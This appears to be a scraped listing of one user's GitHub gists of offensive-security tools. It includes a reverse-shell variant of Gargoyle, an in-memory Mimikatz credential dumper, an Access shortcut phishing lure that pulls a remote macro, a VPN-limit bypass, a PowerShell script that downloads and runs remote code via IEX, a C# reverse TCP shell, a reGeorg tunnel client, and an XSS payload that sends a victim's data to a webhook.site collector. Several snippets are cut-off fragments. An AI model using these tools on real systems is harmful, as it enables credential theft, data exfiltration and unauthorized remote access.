
adon90 / setup.nasm
Last active May 18, 2018 09:56
Gargoyle setup.nasm modified to execute a reverse shell instead of popping a MessageBox
BITS 32
STRUC Configuration
.initialized: RESD 1
.setup_addr: RESD 1
.setup_length: RESD 1
.VirtualProtectEx: RESD 1
.WaitForSingleObjectEx: RESD 1
.CreateWaitableTimer: RESD 1
.SetWaitableTimer: RESD 1
adon90 / mimikatz.ps1
Last active May 29, 2018 10:41
PowerShell Shellcode Injection fix on Win 10 (v1803)
function Invoke-Mimikatz
{
<#
.SYNOPSIS
This script leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed against multiple computers.
This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed.
adon90 / Database3.accde
Last active July 4, 2018 13:08
Phishing via an Access .MAM shortcut: the delivered file carries no macro itself, it points at a remote .accde over HTTP and opens the macro object `pwnid` from it
------Database Shortcut--------
[Shortcut Properties]
AccessShortcutVersion=1
DatabaseName=Database3.accdb
ObjectName=pwnid
ObjectType=Macro
Computer=W10PTTEST
DatabasePath=http://IP/Database3.accde
EnableRemote=0
CreationTime= 1d4138fe237a9fc
adon90 / bypassvpn.txt
Last active July 10, 2018 08:07
Bypass a VPN client-count limit: one host holds the OpenVPN session and the other machines route through it with sshuttle over SSH
HOST
openvpn adon901.ovpn
COMPUTER 1
sshuttle -vr root@HOST 10.10.0.0/8
COMPUTER 2
sshuttle -vr root@HOST 10.10.0.0/8
HOST:
socat TCP4-LISTEN:8443,fork,reuseaddr TCP4:<COMPUTER1>:80
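<#
.SYNOPSIS
Downloads a PowerShell script from $url and executes it in a background job running as another user ("web delivery" pattern).
.DESCRIPTION
Builds a PSCredential from a plaintext username/password, starts a job under that credential,
and inside the job fetches the text at $url through the system proxy (authenticating to the proxy
with the job identity's default credentials) and runs it with Invoke-Expression. Whatever the
downloaded script writes to the pipeline is returned to the caller through Receive-Job.
Security notes for the operator: the password arrives as a plaintext parameter, so it may be
captured by command-line, transcript or script-block logging on the host; the downloaded content
is executed with no integrity check, so only point this at a server you control, preferably over
HTTPS.
.PARAMETER url
URL of the script to download and execute.
.PARAMETER user
Account to run the job as (local user or DOMAIN\user).
.PARAMETER pass
Plaintext password for $user.
#>
function runas-cabesha-webdelivery {
    param ($url, $user, $pass)
    $securePassword = ConvertTo-SecureString $pass -AsPlainText -Force
    $credenciales = New-Object System.Management.Automation.PSCredential $user, $securePassword
    # Start-Job -Credential runs the script block in a separate process under the supplied identity.
    $job = Start-Job -Credential $credenciales -ArgumentList $url, $credenciales -ScriptBlock {
        param ($url, $credenciales)
        $O = New-Object Net.WebClient
        $O.Proxy = [Net.WebRequest]::GetSystemWebProxy()
        $O.Proxy.Credentials = [Net.CredentialCache]::DefaultCredentials
        IEX ($O.DownloadString("$url"))
    }
    try {
        $job | Wait-Job | Receive-Job
    }
    finally {
        # The original left every completed job registered in the session; remove it so repeated
        # calls do not accumulate jobs (and keep the downloaded script's output from lingering there).
        Remove-Job -Job $job -Force -ErrorAction SilentlyContinue
    }
}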
adon90 / ReverseC#TCP
Last active September 30, 2018 14:51
Add-Type -TypeDefinition @"
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.Net.Sockets;
public class ReverseTCP
{
using System;
using System.Collections;
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Http;
using System.Runtime.Serialization.Formatters;
namespace ExampleRemoting
{
public class DateTimeServer : MarshalByRefObject, IDisposable
adon90 / Frida
Created October 29, 2018 13:11
import sys
import pefile
import frida
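def on_message(message, data):
    """Frida message callback: print every message from the injected script.

    Frida calls this with the message object delivered by the agent (per
    Frida's protocol a dict describing a send() payload or a script error --
    not visible in this file, so treat that as an assumption) and an optional
    binary ``data`` buffer. Both are printed verbatim for debugging; nothing
    is filtered or parsed.

    Written as a ``print()`` call with a single argument so the script also
    parses under Python 3; the original used the Python 2 print statement,
    which is a SyntaxError on Python 3. Output is identical on Python 2.
    """
    print("[%s] -> %s" % (message, data))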
adon90 / re.py
Last active September 19, 2019 07:39
reGeorg client with cookie support: the session cookie for the tunnel endpoint is passed with -s and sent on every tunnel request
# Save as re.py, then run: re.py -u http://xx.com/tunnel.aspx -p 8080 -s "PHPSESSIONID: xxxxxxxxxxxxxxxxxx"  (the -s value is the session cookie sent to the tunnel page). Note: the shebang on the next line is only honored by the OS when it is the very first line of the file; invoke the script via `python re.py` or move it above this comment.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import argparse
import signal
import sys
import atexit
adon90 / leak.js
Created October 9, 2019 14:58
XSS exfiltration payload: reads the victim's own record from a same-origin API with their session, extracts one field, and leaks it to an external collector via an image request
<script>
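// XSS PoC payload. Runs in the victim's origin, so the XHR below carries their session
// cookies; it reads the user record from the same-origin API, pulls the OA_mail value out
// of the JSON text with a regex, and exfiltrates it by loading an image from an external
// collector. The collector URL is a hardcoded third-party endpoint (webhook.site) reached
// over plain http, so the leaked value crosses the network in cleartext and anyone reading
// this payload knows where the data went -- replace it with an endpoint you control.
var req = new XMLHttpRequest();
req.onload = function () {
  // onload also fires for non-2xx responses; the regex simply will not match in that case.
  // The pattern assumes the body contains `"OA_mail":["<value>"` (an array of strings) --
  // confirm against the real API response.
  var patt2 = /OA_mail":\["([^"]*?)"/g;
  var match = patt2.exec(req.responseText);
  // The original indexed the exec() result directly, which throws a TypeError (and sends
  // nothing) when the field is absent or the body is not the expected JSON.
  if (match === null) {
    return;
  }
  // Percent-encode so an address containing '&', '+' or '#' arrives intact in the query string.
  new Image().src = ("http://webhook.site/f6dab550-defa-4310-9a79-d0c5c1e9fdcc/?cc=" + encodeURIComponent(match[1]));
};
req.open("GET", "/api/dataUsers/v1/WebStore/getUser", true);
req.send();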
</script>